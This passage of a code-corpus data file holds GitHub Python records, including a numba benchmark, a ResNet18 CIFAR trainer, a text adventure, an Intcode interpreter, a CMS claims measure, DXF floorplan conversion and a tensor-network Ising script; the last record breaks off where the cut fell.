+{"seq_id":"39409939879","text":"import numpy as np\nimport numba as nb\nimport time\n\n@nb.njit(parallel=True)\ndef laplace_kernel(V):\n ans=np.empty(V.shape)\n n=V.shape[0]\n m=V.shape[1]\n for i in nb.prange(1,n-1):\n for j in range(1,m-1):\n ans[i,j]=V[i,j]-np.log(0.25*(np.exp(V[i,j-1])+np.exp(V[i,j+1])+np.exp(V[i-1,j])+np.exp(V[i+1,j])))\n return ans\n\n\nn=1000\nx=np.random.rand(n,n)\n\ny1=laplace_kernel(x)\nt1=time.time()\ny1=laplace_kernel(x)\nt2=time.time()\nprint('numba kernel took ',t2-t1)\n\nt1=time.time()\ny2=x-0.25*(np.roll(x,1,axis=0)+np.roll(x,-1,axis=0)+np.roll(x,1,axis=1)+np.roll(x,-1,axis=1))\nt2=time.time()\nprint('roll took ',t2-t1)\nprint(np.std( (y2-y1)[1:-1,1:-1]))\n\n","repo_name":"sievers/phys512-2021","sub_path":"performance/laplace_2d_numba.py","file_name":"laplace_2d_numba.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"}
+{"seq_id":"71828077842","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch import nn, optim\n\n\"\"\"\nResnet18要经过一个卷积层、Pooling层,然后是四个“小方块”,一个方块由两个A Build Block组成,\n一个A Build Block又由两个卷积层组成,四个“小方块”即16层,最后是average pool、全连接层。\n由于Pooling层不需要参数学习,故去除Pooling层,整��resnet18网络由18层组成\nhttps://blog.csdn.net/weixin_39867066/article/details/112275617\n\nmodel des: ResNet18(\n (conv1): Sequential(\n (0): Conv2d(3, 64, kernel_size=(3, 3), stride=(3, 3))\n (1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (blk1): ResBlk(\n (conv1): Conv2d(64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1))\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (extra): Sequential(\n (0): Conv2d(64, 128, kernel_size=(1, 1), stride=(2, 2))\n (1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (blk2): ResBlk(\n (conv1): Conv2d(128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1))\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (extra): Sequential(\n (0): Conv2d(128, 256, kernel_size=(1, 1), stride=(2, 2))\n (1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (blk3): ResBlk(\n (conv1): Conv2d(256, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1))\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (extra): Sequential(\n (0): Conv2d(256, 512, kernel_size=(1, 1), stride=(2, 2))\n (1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (blk4): ResBlk(\n (conv1): Conv2d(512, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1))\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (extra): Sequential()\n )\n (outLayer): Linear(in_features=512, out_features=10, bias=True)\n)\n\"\"\"\n\n\nclass ResBlk(nn.Module):\n\n def __init__(self, channel_in, channel_out, stride=1):\n super(ResBlk, self).__init__()\n\n self.conv1 = nn.Conv2d(channel_in, channel_out, kernel_size=3, stride=stride, padding=1)\n self.bn1 = nn.BatchNorm2d(channel_out)\n self.conv2 = nn.Conv2d(channel_out, channel_out, kernel_size=3, stride=1, padding=1)\n self.bn2 = nn.BatchNorm2d(channel_out)\n\n # 短接层\n self.extra = nn.Sequential()\n # 保证X与res层相加时维度是对应的,这步只是进行转化成相同维度\n if channel_out != channel_in: # [b, ch_in, h, w] => [b, ch_out, h, w]\n self.extra = nn.Sequential(\n nn.Conv2d(channel_in, channel_out, kernel_size=1, stride=stride),\n nn.BatchNorm2d(channel_out)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out = self.extra(x) + out\n out = 
F.relu(out)\n\n return out\n\n\nclass ResNet18(nn.Module):\n\n def __init__(self):\n super(ResNet18, self).__init__()\n\n self.conv1 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, stride=3, padding=0),\n nn.BatchNorm2d(64)\n )\n\n self.blk1 = ResBlk(64, 128, stride=2) # 减少了feature像素,可以增加通道\n self.blk2 = ResBlk(128, 256, stride=2)\n self.blk3 = ResBlk(256, 512, stride=2)\n self.blk4 = ResBlk(512, 512, stride=2)\n\n self.outLayer = nn.Linear(512 * 1 * 1, 10)\n\n def forward(self, x):\n\n x = F.relu(self.conv1(x))\n\n x = self.blk1(x)\n x = self.blk2(x)\n x = self.blk3(x)\n x = self.blk4(x)\n\n x = F.adaptive_avg_pool2d(x, [1, 1])\n\n x = x.view(x.size(0), -1)\n x = self.outLayer(x)\n\n return x\n\nclass RunResNet18:\n def run(self):\n batchSize = 128\n epochs = 10\n # download data\n cifar_train = datasets.CIFAR10('cifar', True, transform=transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]), download=True)\n cifar_train = DataLoader(cifar_train, batch_size=batchSize, shuffle=True)\n\n cifar_test = datasets.CIFAR10('cifar', False, transform=transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]), download=True)\n cifar_test = DataLoader(cifar_test, batch_size=batchSize, shuffle=True)\n\n # x,label=iter(cifar_train).next()\n x, label = iter(cifar_test).next()\n print(\"x: \", x.shape, \"label: \", label.shape) # x: torch.Size([128, 3, 32, 32]) label: torch.Size([128])\n\n # model\n model = ResNet18()\n # loss\n criteon = nn.CrossEntropyLoss()\n # optimizer\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\n\n print(\"model des: \", model)\n\n for epoch in range(epochs):\n\n model.train()\n for batchIdx, (x, label) in enumerate(cifar_train):\n # x:[b,3,32,32] label:[b]\n # forward\n logits = model(x) # logits:[b,10]\n loss = criteon(logits, label)\n\n # backprop\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batchIdx % 300 == 0:\n print(epoch, batchIdx,\"loss: \", loss.item())\n\n # test\n model.eval()\n with torch.no_grad():\n total_correct = 0\n total_num=0\n for x,label in cifar_test:\n logits=model(x) # logits:[b,10]\n pred=logits.argmax(dim=1) # pred:[b]\n # print(\"logits[0]\",logits[0])\n correct=torch.eq(pred,label).float().sum().item()\n total_correct+=correct\n total_num+=x.size(0)\n\n accuracy=total_correct/total_num\n print(epoch,\"acc:\",accuracy)\n\n\nif __name__ == '__main__':\n # blk = ResBlk(64,128,4)\n # tmp = torch.rand(2, 64, 32, 32)\n # out = blk(tmp)\n # print(out.shape) # torch.Size([2, 128, 8, 8])\n\n # x = torch.rand(2, 3, 32, 32)\n # model = ResNet18()\n # out = model(x)\n # print(out.shape) # torch.Size([2, 10])\n\n cl=RunResNet18()\n cl.run()","repo_name":"Jacquelin803/DL","sub_path":"PytrochDL/c10Ciifar/Resnet.py","file_name":"Resnet.py","file_ext":"py","file_size_in_byte":7540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
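The `extra` 1x1 projection in `ResBlk` above exists because a strided or channel-changing main branch no longer matches `x` elementwise. A shape-only sketch:

```python
import torch
from torch import nn

x = torch.randn(2, 64, 32, 32)
branch = nn.Conv2d(64, 128, kernel_size=3, stride=2, padding=1)(x)  # main path
shortcut = nn.Conv2d(64, 128, kernel_size=1, stride=2)(x)           # 1x1 projection
print(branch.shape, shortcut.shape)  # both torch.Size([2, 128, 16, 16])
out = branch + shortcut              # the residual add is now well-defined
```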
+{"seq_id":"4563278985","text":"import math\ndef isPrime(n):\n if(n < 2): return False\n for i in range(2, int(math.sqrt(n)) + 1):\n if(n%i == 0): return False\n return True\nn = int(input())\na = [int(val) for val in input().split()]\nres = []\nfor val in a:\n if(isPrime(val) and (val not in res)):\n res.append(val)\nfor val in res:\n print(val, a.count(val))","repo_name":"naruto-2002/PYTHON","sub_path":"danh_sach/liet_ke_so_nguyen_to_trong_day.py","file_name":"liet_ke_so_nguyen_to_trong_day.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4343457565","text":"import sys\nn = int(sys.stdin.readline())\n# 색상 지정\n# 1부터 다루기 위해서 지정한 것이다.\na = [[0, 0, 0]] + [list(map(int, sys.stdin.readline().split())) for _ in range(n)]\nd = [[0]*3 for _ in range(n+1)]\n\nans = 1000*1000 + 1\n# 1번째의 집의 색상을 미리 고정하기 \nfor k in range(3): \n for j in range(3):\n if j == k:\n d[1][j] = a[1][j]\n else:\n d[1][j] = 1000*1000 + 1\n \n for i in range(2 , n+1):\n d[i][0] = min(d[i-1][1], d[i-1][2]) + a[i][0]\n d[i][1] = min(d[i-1][0], d[i-1][2]) + a[i][1]\n d[i][2] = min(d[i-1][1], d[i-1][0]) + a[i][2]\n \n for j in range(3):\n if j == k:\n continue\n ans = min(ans, d[n][j])\n\nprint(ans)\n \n","repo_name":"kalelpark/Baekjoon-Programmers","sub_path":"다이나믹 프로그래밍/BOJ17404.py","file_name":"BOJ17404.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20764156302","text":"# zombie_part3.py\n#----------------------------------------------------------\n# Part 3 refactors the place_monster() function and the \n# monster attribute variables into a create_monster() \n# function. It also creates the place_cheese() function and\n# the \"take\" command to pick up the cheese.\n#\n# We also debug some of our command processing in the game\n# loop.\n#----------------------------------------------------------#\n\n# import libraries\nimport os\nimport random\n\n# create map\n#\n# kitchen => dining room\n# dining room => kitchen, ballroom\n# ballroom => dining room\n#\n\n#------------------------------ FUNCTIONS ------------------------------#\n\n# room function (controls map and room details)\ndef room_details(current):\n if current == \"Kitchen\":\n print(\"Kitchen\")\n print(\"--------------------\")\n print(\"A dank and dirty room buzzing with flies.\")\n print(\"The dining room is east.\")\n\n elif current == \"Dining Room\":\n print(\"Dining Room\")\n print(\"--------------------\")\n print(\"A large room with ornate golden decorations on each wall.\")\n print(\"The kitchen is west.\")\n print(\"The ballroom is north.\")\n\n else:\n print(\"Ballroom\")\n print(\"--------------------\")\n print(\"A vast room with a shiny wooden floor. Huge candlesticks guard the entrance.\")\n print(\"The dining room is south.\")\n\n# move function (gives possible room directions)\ndef move(current, direction):\n if current == \"Kitchen\":\n if direction.lower() == \"east\":\n current = \"Dining Room\"\n\n elif current == \"Dining Room\":\n if direction.lower() == \"west\":\n current = \"Kitchen\"\n else:\n current = \"Ballroom\"\n\n else:\n if direction.lower() == \"south\":\n current = \"Dining Room\"\n\n return current\n\n# make zombie function (randomly located)\ndef create_zombie():\n rand_room = random.randint(1, 3)\n if rand_room == 1:\n room = \"Kitchen\"\n elif rand_room == 2:\n room = \"Dining Room\"\n elif rand_room == 3:\n room = \"Ballroom\"\n\n name = \"Larry\"\n description = \"A smelly zombie\"\n message = \"What's up, dude! I'm hungry, and I like brains.\"\n\n return room, name, description, message\n\ndef place_cheese():\n rand_cheese = random.randint(1, 3)\n if rand_cheese == 1:\n room = \"Kitchen\"\n elif rand_cheese == 2:\n room = \"Dining Room\"\n elif rand_cheese == 3:\n room = \"Ballroom\"\n\n return room\n\n#------------------------------ GAME ------------------------------#\n\n# clear screen and give directions\nos.system(\"clear\")\n\nprint(\"+-------------------+\".center(50))\nprint(\"| Zombie Room |\".center(50))\nprint(\"+-------------------+\".center(50))\n\n# game loop\n\ncurrent_room = \"Kitchen\"\nzombie_room, zombie_name, zombie_description, zombie_message = create_zombie()\ncheese_room = place_cheese()\nhave_cheese = False\n\ndead = False\n\nwhile dead == False:\n # print current room\n print(\"\\n\")\n room_details(current_room)\n # print zombie details\n if current_room == zombie_room:\n print()\n print(zombie_description, \"named\", zombie_name, \"is here! He looks like he has something to say.\")\n if current_room == cheese_room:\n print()\n print(\"A large, stinky chunk of cheese moulders in the corner.\")\n\n # prompt user for command\n command = input(\"> \")\n\n # evaluate and execute move command\n if command.lower() in [\"north\", \"south\", \"east\", \"west\"]:\n current_room = move(current_room, command)\n\n # talk to zombie - if there is one! 
\n elif command.lower() == \"talk\":\n if current_room == zombie_room:\n print(zombie_message)\n else:\n print(\"Um...There's no one else here.\")\n\n # put cheese in backpack\n elif command.lower() == \"take\":\n if current_room == cheese_room:\n have_cheese = True\n print(\"You put the cheese in your backpack. Now you can fight the zombie!\")\n else:\n print(\"There's nothing here to take!\")\n\n # warn user about invalid commands\n else:\n print(\"I don't know how to \" + command)\n print(\"\\n-----------------------------------\")\n\n\n\n","repo_name":"samkoe/utilities","sub_path":"zombie_room/zombie_part3.py","file_name":"zombie_part3.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72825012560","text":"\"\"\"Processes a provider's claims to assess whether they meet CT Scan criteria.\"\"\"\nfrom claims_to_quality.analyzer.calculation.qpp_measure import QPPMeasure\nfrom claims_to_quality.analyzer.processing import claim_filtering\nfrom claims_to_quality.lib.connectors import idr_queries\nfrom claims_to_quality.lib.helpers.decorators import override\nfrom claims_to_quality.lib.qpp_logging import logging_config\nfrom claims_to_quality.lib.teradata_methods import execute\n\nimport newrelic.agent\n\nlogger = logging_config.get_logger(__name__)\n\n\nclass CTScanMeasure(QPPMeasure):\n \"\"\"\n Represents measures 415 and 416.\n\n If a provider has submitted any G-codes relevant to the measure:\n 1. check to see if there is a claim which includes relevant diagnosis and encounter\n codes, as usual.\n 2. If there is, then check the IDR to see if the beneficiary received a CT scan on any of\n the same dates of service.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize CT Scan Measure instance.\"\"\"\n super(CTScanMeasure, self).__init__(*args, **kwargs)\n self.fields_to_group_by = ['bene_sk']\n\n self.procedure_codes = [\n procedure_code.code\n for eligibility_option in self.eligibility_options\n for procedure_code in eligibility_option.procedure_codes\n ]\n\n @newrelic.agent.function_trace(name='execute-ct-scan-measure', group='Task')\n @override\n def execute(self, claims):\n \"\"\"Execute CT Scan Measure calculation.\"\"\"\n return super(CTScanMeasure, self).execute(claims)\n\n def _filter_by_ct_scan(self, claims):\n \"\"\"\n Return a list of eligible claims based on measure criteria.\n\n For CT Scan best practice measures, this means instances for which CT scans were performed\n (perhaps by a different provider) on the same day.\n \"\"\"\n bene_date_set = {\n (claim.bene_sk, claim_line.clm_line_from_dt)\n for claim in claims\n for claim_line in claim.claim_lines\n if claim_line.clm_line_hcpcs_cd in self.procedure_codes\n }\n\n ct_scan_benes_and_dates = self._get_ct_scan_beneficiaries_and_dates(bene_date_set)\n\n return [\n claim for claim in claims\n if any(\n (\n (claim.bene_sk, claim_line.clm_line_from_dt) in ct_scan_benes_and_dates\n for claim_line in claim.claim_lines\n if claim_line.clm_line_hcpcs_cd in self.procedure_codes\n )\n )\n ]\n\n @override\n def filter_by_eligibility_criteria(self, claims):\n \"\"\"Return a list of eligible claims based on measure criteria.\"\"\"\n quality_codes = self.measure_definition.get_measure_quality_codes()\n\n if not claim_filtering.do_any_claims_have_quality_codes(\n claims_data=claims, quality_codes=quality_codes):\n return []\n\n prefilter_claims = super(CTScanMeasure, self).filter_by_eligibility_criteria(claims)\n return CTScanMeasure._filter_by_ct_scan(self, prefilter_claims)\n\n @newrelic.agent.function_trace(name='get-ct-scan-dates-by-beneficiary', group='Task')\n def _get_ct_scan_beneficiaries_and_dates(self, bene_date_set):\n \"\"\"Query the IDR for matching CT scans for the given beneficiaries on the given dates.\"\"\"\n if not bene_date_set:\n return {}\n\n logger.debug('Query IDR for CT scan dates.')\n\n ct_scan_query = idr_queries.get_ct_scan_query(bene_date_set=bene_date_set)\n rows = execute.execute(ct_scan_query)\n\n return {\n (row['bene_sk'], row['clm_line_from_dt']) for row in rows\n 
}\n","repo_name":"CMSgov/qpp-claims-to-quality-public","sub_path":"claims_to_quality/analyzer/calculation/ct_scan_measure.py","file_name":"ct_scan_measure.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"}
+{"seq_id":"30515449342","text":"import platform\n\nimport numpy as np\nimport pytest\nimport torch\nfrom mmcv.transforms import to_tensor\nfrom mmengine.structures import InstanceData\n\nfrom mmaction.registry import MODELS\nfrom mmaction.structures import ActionDataSample\nfrom mmaction.testing import get_localizer_cfg\nfrom mmaction.utils import register_all_modules\n\nregister_all_modules()\n\n\ndef get_localization_data_sample():\n gt_bbox = np.array([[0.1, 0.3], [0.375, 0.625]])\n data_sample = ActionDataSample()\n instance_data = InstanceData()\n instance_data['gt_bbox'] = to_tensor(gt_bbox)\n data_sample.gt_instances = instance_data\n data_sample.set_metainfo(\n dict(\n video_name='v_test',\n duration_second=100,\n duration_frame=960,\n feature_frame=960))\n return data_sample\n\n\n@pytest.mark.skipif(platform.system() == 'Windows', reason='Windows mem limit')\ndef test_tem():\n model_cfg = get_localizer_cfg(\n 'bsn/bsn_tem_1xb16-400x100-20e_activitynet-feature.py')\n\n localizer_tem = MODELS.build(model_cfg.model)\n raw_feature = torch.rand(8, 400, 100)\n # gt_bbox = torch.Tensor([[[1.0, 3.0], [3.0, 5.0]]] * 8)\n data_samples = [get_localization_data_sample()] * 8\n losses = localizer_tem(raw_feature, data_samples, mode='loss')\n assert isinstance(losses, dict)\n\n # Test forward predict\n with torch.no_grad():\n for one_raw_feature in raw_feature:\n one_raw_feature = one_raw_feature.reshape(1, 400, 100)\n data_samples = [get_localization_data_sample()]\n localizer_tem(one_raw_feature, data_samples, mode='predict')\n","repo_name":"open-mmlab/mmaction2","sub_path":"tests/models/localizers/test_tem.py","file_name":"test_tem.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"}
+{"seq_id":"70213602002","text":"from collections import defaultdict\n\n\nwith open('input') as f:\n ns = list(map(int, f.read().split(',')))\n\n\ndef run(inp):\n p = defaultdict(int, enumerate(ns))\n i = 0\n base = 0\n while True:\n cmd = str(p[i]).zfill(5)\n opcode = int(cmd[3:])\n modes = {k: int(cmd[3 - k]) for k in (1, 2, 3)}\n addrs = {}\n for k in (1, 2, 3):\n try:\n if modes[k] == 0:\n addrs[k] = p[i+k]\n elif modes[k] == 1:\n addrs[k] = i+k\n elif modes[k] == 2:\n addrs[k] = p[i+k]+base\n except IndexError:\n pass\n if opcode == 1:\n p[addrs[3]] = p[addrs[1]] + p[addrs[2]]\n i += 4\n elif opcode == 2:\n p[addrs[3]] = p[addrs[1]] * p[addrs[2]]\n i += 4\n elif opcode == 3:\n p[addrs[1]] = inp\n i += 2\n elif opcode == 4:\n print(p[addrs[1]])\n i += 2\n elif opcode == 5:\n i = p[addrs[2]] if p[addrs[1]] != 0 else i + 3\n elif opcode == 6:\n i = p[addrs[2]] if p[addrs[1]] == 0 else i + 3\n elif opcode == 7:\n p[addrs[3]] = int(p[addrs[1]] < p[addrs[2]])\n i += 4\n elif opcode == 8:\n p[addrs[3]] = int(p[addrs[1]] == p[addrs[2]])\n i += 4\n elif opcode == 9:\n base += p[addrs[1]]\n i += 2\n elif opcode == 99:\n return\n\n\n# Part one\nrun(1)\n\n# Part two\nrun(2)\n","repo_name":"fuglede/adventofcode","sub_path":"2019/day09/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"3"}
+{"seq_id":"10365342766","text":"import os\nimport stravalib\nimport datetime\nimport psycopg2 as psy\nimport pandas as pd\n\nfrom activity_dashboard.dash_apps.finished_apps import driver\nfrom scripts import postgres as db\nfrom scripts import helper\n\ndef account_totals(all_runs, athlete, unit):\n convert = {\n 'imperial': [(0.000621371, 'mi'),\n (3.28084, 'ft')],\n 'metric': [(.001, 'km'),\n (1, 'm')]\n }\n\n # Distance\n total_dist = all_runs['dist'].sum()\n dist = f'{\"{:,}\".format(int(total_dist * convert[unit][0][0] + 0.5))} {convert[unit][0][1]}'\n dist_fun = f'{round(total_dist/(40.075*10**6), 2)} times around the Earth!'\n\n # Time\n total_time = all_runs['time'].sum()\n time = helper.format_time(total_time)\n intervals = (\n ('weeks', 604800), # 60 * 60 * 24 * 7\n ('days', 86400), # 60 * 60 * 24\n ('hours', 3600), # 60 * 60\n ('minutes', 60),\n ('seconds', 1),\n )\n\n def display_time(seconds, granularity=5):\n result = []\n\n for name, count in intervals:\n value = seconds // count\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(\"{} {}\".format(value, name))\n return ', '.join(result[:granularity])\n time_fun = display_time(total_time)\n\n # Elevation\n total_elev = all_runs['elev'].sum()\n elev = f'{\"{:,}\".format(int(total_elev * convert[unit][1][0] + 0.5))} {convert[unit][1][1]}'\n elev_fun = f'{round(total_elev/8848, 2)} ascents of Mt. Everest!'\n\n # Activity count\n count = '{:,}'.format(all_runs['activity_id'].count())\n\n res = {'dist': dist,\n 'dist_fun': dist_fun,\n 'time': time,\n 'time_fun': time_fun,\n 'elev': elev,\n 'elev_fun': elev_fun,\n 'count': count,\n }\n\n return res","repo_name":"mgoyanes/runcrunch","sub_path":"home/scripts/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"1511105382","text":"import pystache\nfrom covid19visuals import constants, templates\nimport importlib.resources as pkg_resources\n\n\ndef build_index_html(total_cases, total_cases_us, total_deaths, total_deaths_us):\n html = pkg_resources.read_text(templates, 'index.html')\n last_updated = f'{constants.NOW.replace(microsecond=0).strftime(\"%A, %d %B %Y, %H:%M %Z\")}'\n template_data = {\n 'total_cases': f'{total_cases:,}',\n 'total_cases_us': f'{total_cases_us:,}',\n 'total_deaths': f'{total_deaths:,}',\n 'total_deaths_us': f'{total_deaths_us:,}',\n 'last_updated': last_updated\n }\n rendered = pystache.render(html, template_data)\n with open('index.html', 'w') as f:\n f.write(rendered)\n print('Saved file: index.html')\n","repo_name":"ccampo133/covid19-visualizations","sub_path":"covid19visuals/templating.py","file_name":"templating.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"70858374481","text":"#!/usr/bin/env python3\n\nimport copy\nimport json\nimport glob\nimport os\nimport sys\n\ntry:\n\timport dxfgrabber\nexcept:\n\tprint('You need dxfgrabber')\n\tprint('sudo pip install dxfgrabber')\n\tsys.exit(1)\n\n\nbuildings = {}\n\nbuilding_template = {\n\t'name': '',\n\t'name_short': '',\n\t'gps_latitude': 0,\n\t'gps_longitude': 0,\n\t'width': 0,\n\t'height': 0,\n\t'floors': {}\n};\n\nfloor_template = {\n\t'name': '',\n\t'z':0,\n\t'rooms':[]\n}\n\ndxfs = glob.glob('../floorplan/*.dxf')\nfor dxf in dxfs:\n\tdirname = os.path.dirname(dxf)\n\tfilename = os.path.splitext(dxf)[0]\n\n\tbuilding_id,floorid = os.path.basename(filename).split('_')\n\n\t# Parse the .DXF\n\tdxfparsed = dxfgrabber.readfile(dxf)\n\n\t# Make sense of the rooms\n\tmin_global_x = 10000000.0\n\tmin_global_y = 10000000.0\n\tmax_global_x = -10000000.0\n\tmax_global_y = -10000000.0\n\n\trooms = []\n\n\twith open(filename + '_rooms.txt') as f:\n\t\troom_numbers = f.readlines()\n\n\tfor e in dxfparsed.entities:\n\t\tif type(e) == dxfgrabber.entities.Polyline:\n\t\t\troom = {'lower_left':[],\n\t\t\t 'vertices':[]}\n\n\t\t\tmin_x = 1000000.0\n\t\t\tmin_y = 1000000.0\n\n\n\t\t\tfor v in e.points():\n\t\t\t\tx = round(v[0]/1000.0, 4)\n\t\t\t\ty = round(v[1]/1000.0, 4)\n\t\t\t\troom['vertices'].append([x,y])\n\n\t\t\t\tif x < min_x:\n\t\t\t\t\tmin_x = x\n\t\t\t\tif y < min_y:\n\t\t\t\t\tmin_y = y\n\n\t\t\t\tif x < min_global_x:\n\t\t\t\t\tmin_global_x = x\n\t\t\t\tif y < min_global_y:\n\t\t\t\t\tmin_global_y = y\n\n\t\t\t\tif x > max_global_x:\n\t\t\t\t\tmax_global_x = x\n\t\t\t\tif y > max_global_y:\n\t\t\t\t\tmax_global_y = y\n\n\t\t\tfor v in room['vertices']:\n\t\t\t\tv[0] -= min_x\n\t\t\t\tv[1] -= min_y\n\n\t\t\troom['lower_left'] = [min_x, min_y]\n\n\t\t\trooms.append(room)\n\n\n\t# Check if this building exists (from parsing a different floor)\n\tif building_id not in buildings:\n\t\tbuildings[building_id] = copy.deepcopy(building_template)\n\n\t\t# Fill in info from .info file\n\t\twith open(dirname + '/' + building_id + '.info') as f:\n\t\t\tfor line in f:\n\t\t\t\tif len(line.strip()) == 0:\n\t\t\t\t\tcontinue\n\t\t\t\topts = line.split(':', 1)\n\t\t\t\tbuildings[building_id][opts[0].strip().lower()] = opts[1].strip()\n\n\t# Add the new floor\n\tbuildings[building_id]['floors'][floorid] = copy.deepcopy(floor_template)\n\tbuildings[building_id]['floors'][floorid]['z'] = (int(floorid)-1)*8\n\n\t# Check if we made the building bigger\n\twidth = max_global_x - min_global_x\n\theight = max_global_y - min_global_y\n\tif width > buildings[building_id]['width']:\n\t\tbuildings[building_id]['width'] = width\n\tif height > buildings[building_id]['height']:\n\t\tbuildings[building_id]['height'] = height\n\n\t# All all rooms\n\n\t# order by lowest y value, then use lowest x value to break any ties\n\tdef orderroom(r):\n\t\treturn r['lower_left'][1]*1000.0 + r['lower_left'][0]\n\n\tfor i,room in zip(range(len(rooms)), sorted(rooms, key=orderroom)):\n\t\toffset_x = room['lower_left'][0] - min_global_x\n\t\toffset_y = room['lower_left'][1] - min_global_y\n\n\t\tbuildings[building_id]['floors'][floorid]['rooms'].append({\n\t\t\t'name': room_numbers[i].strip(),\n\t\t\t'coordinates': room['vertices'],\n\t\t\t'offset': (offset_x, offset_y)\n\t\t})\n\n\nfor buildingid,building in buildings.items():\n\twith open('../web/' + buildingid + '.json', 'w') as 
f:\n\t\tf.write(json.dumps(building))\n\n","repo_name":"lab11/visualizations","sub_path":"3d_building/python/create_building_json.py","file_name":"create_building_json.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
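The orderroom key above sorts rooms bottom-to-top, left-to-right; a tiny check with made-up lower_left coordinates:

rooms = [{'lower_left': [2.0, 1.0]}, {'lower_left': [0.5, 1.0]}, {'lower_left': [1.0, 0.0]}]

def orderroom(r):
    # weight y heavily so x only breaks ties between rooms on the same row
    return r['lower_left'][1] * 1000.0 + r['lower_left'][0]

print([r['lower_left'] for r in sorted(rooms, key=orderroom)])
# [[1.0, 0.0], [0.5, 1.0], [2.0, 1.0]]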
+{"seq_id":"6509033994","text":"import numpy as np\nimport time\nimport networkx\n\nfrom TNR.Models.isingModel import IsingModel2Ddisordered\nfrom TNR.Contractors.contractor import replicaContractor\nfrom TNR.Contractors.heuristics import loopHeuristic as heuristic\n\nfrom TNR.Actions.loop_svd_elim import loop_svd_single_elim_network as eliminateLoops\nfrom TNR.Actions.optimize_loop import loop_svd_optimize_network as optimize\nfrom TNR.Actions.basic_actions import merge_all_nodes\n\nfrom TNR.Utilities.logger import makeLogger\nfrom TNR import config\nlogger = makeLogger(__name__, config.levels['generic'])\n\n\ndef ising2DFreeEnergy(nX, nY, h, J, accuracy):\n n = IsingModel2Ddisordered(nX, nY, h, J, accuracy)\n\n # Merge all\n n = merge_all_nodes(n, False)\n\n # Eliminate loops\n c = replicaContractor(n, 5, 1e6)\n ind = 0\n nodes = list(n.nodes)\n for node in nodes:\n done = False\n while len(networkx.cycles.cycle_basis(node.tensor.network.toGraph())) > 0:\n ind = c.index_of_least_cost()\n next_info, replaced = c.perform_action(ind, eliminateLoops, node, False)\n\n n = c.replicas[ind].network\n\n arr, log_arr, bdict = n.array\n return (np.log(np.abs(arr)) + log_arr) / (nX * nY)\n\n\nh = 1\nJ = 1\naccuracy = 1e-6\nsize = [(2, 2), (2, 3), (2, 4), (3, 3), (2, 5), (3, 4), (4, 4), (3, 6), (4, 5), (3, 7), (3, 8), (5, 5), (3, 9),\n (4, 7), (5, 6), (4, 8), (5, 7), (6, 6), (6, 